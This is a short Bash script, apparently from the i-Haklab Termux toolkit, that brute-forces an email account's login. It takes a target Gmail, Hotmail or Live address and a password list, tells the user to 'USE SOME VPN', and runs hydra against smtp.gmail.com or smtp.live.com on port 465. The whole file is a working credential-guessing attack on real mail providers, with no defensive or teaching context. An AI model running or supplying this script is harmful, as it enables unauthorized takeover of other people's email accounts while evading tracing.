#!/bin/bash
#This file is part of i-Haklab command

if [ -d /data/data/com.termux/files/home/i-Haklab ]; then
        iHAKLAB=/data/data/com.termux/files/home/i-Haklab                                   else
        iHAKLAB=/data/data/com.termux/files/home/storage/external-1/roothome/i-Haklab
fi

source $iHAKLAB/.set/libexec/colors
source $iHAKLAB/.set/var/variables
source $iHAKLAB/.set/functions/functions

echo $2 > $PREFIX/tmp/bfmail
MAIL=$(cat $PREFIX/tmp/bfmail | grep -oE '([hotgmailve]{4,7})')
if [ ! -e $3 ]; then
	printf "$R[w]->$W File for passwords not found"
elif [ -e $3 ] && [ "$MAIL" = "hotmail" -o "$MAIL" = "live" -o "$MAIL" = "gmail" ]; then
	rm $PREFIX/tmp/bfmail
        printf "$R[w]-> USE SOME VPN <-[w]$W\n  press$G enter$W to start\n"
        read enter
        if [ "$MAIL" = hotmail -o "$MAIL" = "live" ]; then
                SMTP=smtp.live.com
        elif [ "$MAIL" = "gmail" ]; then
                SMTP=smtp.gmail.com
        else
                printf "$R[w]->$W There is not a valid server"
        fi
        chk-hydra
        hydra -S -l $2 -P $3 -e ns -V -s 465 $SMTP smtp
fi
